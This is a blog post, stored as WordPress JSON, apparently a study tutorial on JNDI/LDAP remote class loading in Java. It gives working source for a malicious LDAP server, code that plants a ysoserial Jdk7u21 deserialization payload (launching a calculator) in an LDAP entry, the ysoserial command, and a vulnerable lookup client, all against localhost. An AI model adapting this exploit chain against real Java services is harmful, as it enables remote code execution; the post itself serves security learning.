{"id":260,"date":"2020-02-23T03:53:38","date_gmt":"2020-02-22T19:53:38","guid":{"rendered":"https:\/\/blog.73007300.xyz\/?p=260"},"modified":"2020-04-02T21:44:18","modified_gmt":"2020-04-02T13:44:18","slug":"java%e8%bf%9c%e7%a8%8b%e5%8a%a0%e8%bd%bd%e5%88%a9%e7%94%a8%e5%ad%a6%e4%b9%a0%e4%ba%8c%ef%bc%9alookup-ldap-%e5%88%a9%e7%94%a8","status":"publish","type":"post","link":"https:\/\/blog.73007300.xyz\/?p=260","title":{"rendered":"Java Remote Loading Exploitation Study, Part 2: Exploiting lookup over LDAP"},"content":{"rendered":"\n<p>This section introduces an LDAP service. Using JNDI (Java Naming and Directory Interface) to lookup the LDAP service causes a remote class to be loaded.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The malicious LDAP service<\/h2>\n\n\n\n<p>Create an LDAP service:<br> com.hans.ldapServer.LDAPRefServer <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>package com.hans.ldapServer;\n\n\nimport com.unboundid.ldap.listener.InMemoryDirectoryServer;\nimport com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;\nimport com.unboundid.ldap.listener.InMemoryListenerConfig;\n\nimport javax.net.ServerSocketFactory;\nimport javax.net.SocketFactory;\nimport javax.net.ssl.SSLSocketFactory;\nimport java.io.IOException;\nimport java.net.InetAddress;\n\n\n\/**\n * LDAP server implementation returning JNDI references\n *\n * @author mbechler\n *\/\npublic class LDAPRefServer {\n\n    private static final String LDAP_BASE = \"dc=example,dc=com\";\n\n\n    public static void main(String&#91;] args) throws IOException {\n        int port = 1389;\n\n        try {\n            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);\n            config.setListenerConfigs(new InMemoryListenerConfig(\n                    \"listen\", \/\/$NON-NLS-1$\n                    InetAddress.getByName(\"0.0.0.0\"), \/\/$NON-NLS-1$\n                    port,\n      
              ServerSocketFactory.getDefault(),\n                    SocketFactory.getDefault(),\n                    (SSLSocketFactory) SSLSocketFactory.getDefault()));\n\n            config.setSchema(null);\n            config.setEnforceAttributeSyntaxCompliance(false);\n            config.setEnforceSingleStructuralObjectClass(false);\n\n            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);\n            ds.add(\"dn: \" + \"dc=example,dc=com\", \"objectClass: top\", \"objectclass: domain\");\n            ds.add(\"dn: \" + \"ou=employees,dc=example,dc=com\", \"objectClass: organizationalUnit\", \"objectClass: top\");\n            ds.add(\"dn: \" + \"uid=hans,ou=employees,dc=example,dc=com\", \"objectClass: ExportObject\");\n\n            System.out.println(\"Listening on 0.0.0.0:\" + port); \/\/$NON-NLS-1$\n            ds.startListening();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>Inject a malicious object into the LDAP service:<br>\npackage com.hans.ldapServer.LDAPServer1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>package com.hans.ldapServer;\n\nimport javax.naming.Context;\nimport javax.naming.NamingException;\nimport javax.naming.directory.BasicAttribute;\nimport javax.naming.directory.DirContext;\nimport javax.naming.directory.InitialDirContext;\nimport javax.naming.directory.ModificationItem;\nimport java.io.File;\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.util.Hashtable;\n\npublic class LDAPServer1 {\n    public static void main(String&#91;] args) throws NamingException, IOException {\n    \tSystem.out.println(\"Working Directory = \" +\n                System.getProperty(\"user.dir\"));\n        Hashtable env = new Hashtable();\n        env.put(Context.INITIAL_CONTEXT_FACTORY,\n                \"com.sun.jndi.ldap.LdapCtxFactory\");\n        env.put(Context.PROVIDER_URL, \"ldap:\/\/localhost:1389\");\n\n        DirContext ctx 
= new InitialDirContext(env);\n\n\t\t\/\/ not used for now\n        String javaCodebase = \"http:\/\/127.0.0.1:8000\/\";\n\n\n        byte&#91;] javaSerializedData = Files.readAllBytes(new File(\"resources\/Jdk7u21_calc.ser\").toPath());\n\n        BasicAttribute mod1 = new\n                BasicAttribute(\"javaCodebase\", javaCodebase);\n        BasicAttribute mod2 = new\n                BasicAttribute(\"javaClassName\", \"DeserPayload\");\n        BasicAttribute mod3 = new BasicAttribute(\"javaSerializedData\",\n                javaSerializedData);\n        ModificationItem&#91;] mods = new ModificationItem&#91;3];\n        mods&#91;0] = new ModificationItem(DirContext.ADD_ATTRIBUTE, mod1);\n        mods&#91;1] = new ModificationItem(DirContext.ADD_ATTRIBUTE, mod2);\n        mods&#91;2] = new ModificationItem(DirContext.ADD_ATTRIBUTE, mod3);\n        ctx.modifyAttributes(\"uid=hans,ou=employees,dc=example,dc=com\", mods);\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>Generate a payload with ysoserial and place it in the resources directory:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'gnome-calculator' > Jdk7u21_calc.ser<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">The affected service<\/h2>\n\n\n\n<p>com.hans.weblogicLdapExploit.Payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>package com.hans.weblogicLdapExploit;\n\nimport javax.naming.Context;\nimport javax.naming.directory.DirContext;\nimport javax.naming.directory.InitialDirContext;\n\nimport java.util.Hashtable;\n\npublic class Payload  {\n\n    public final static String JNDI_FACTORY = \"com.sun.jndi.ldap.LdapCtxFactory\";\n    public final static String url = \"ldap:\/\/localhost:1389\";\n    public static void main(String&#91;] args) throws Exception {\n    \t\/*\n\t\t    An atomic name is a simple, basic, indivisible component\n\t\t    
A binding is the association of a name with an object; each binding has a distinct atomic name\n\t\t    A compound name contains zero or more atomic names, i.e. it is made up of multiple bindings\n\t\t    A context is an object that contains zero or more bindings; each binding has a distinct atomic name\n\t\t    A naming system is a set of connected contexts\n\t\t    A namespace is all the names contained in a naming system\n\t\t    The starting point for exploring a namespace is called the initial context\n\t\t    To obtain the initial context, an initial context factory is required\n    \t * *\/\n        Hashtable&lt;String, String> env = new Hashtable&lt;String, String>();\n        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);\n        env.put(Context.PROVIDER_URL, url);\n\n        DirContext ctx = new InitialDirContext(env);\n\t    \n        Object local_obj = ctx.lookup(\"uid=hans,ou=employees,dc=example,dc=com\");\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>To trigger the vulnerability, the affected service must run on JDK 7u21 or an earlier JDK version.<br>\nBesides LDAP, these objects can also be stored in other naming or directory services, such as Remote Method Invocation (RMI), the Common Object Request Broker Architecture (CORBA) or the Domain Name Service (DNS).<br>\n360 happens to have recently published research on CORBA:<\/p>\n\n\n\n<p><a 
href=\"https:\/\/cert.360.cn\/report\/detail?id=d3f6666d6558f02a6204dd51cb749558\">https:\/\/cert.360.cn\/report\/detail?id=d3f6666d6558f02a6204dd51cb749558<\/a><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This section introduces an LDAP service. Using JNDI (Java Naming and Directory Interface) to lookup the LDAP service causes a remote class to be loaded. The malicious LDAP service Create an LDAP service: com.hans.ldapServer.LDAPRefServer Inject a malicious object into the LDAP service: package com.hans.ldapServer.LDAPServer1 Generate a payload with ysoserial and place it in the resources directory: The affected service com.hans.weblogicLdapExploit.Payload To trigger the vulnerability, the affected service must run on JDK 7u21 or an earlier JDK version. Besides LDAP, these objects can also be stored in other naming or directory services, such as Remote Method Invocation (RMI), the Common Object Request Broker Architecture (CORBA) or the Domain Name Service (DNS). 360 happens to have recently published research on CORBA: 
https:\/\/cert.360.cn\/report\/detail?id=d3f6666d6558f02a6204dd51cb749558<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,2],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/260"}],"collection":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=260"}],"version-history":[{"count":2,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions\/332"}],"wp:attachment":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}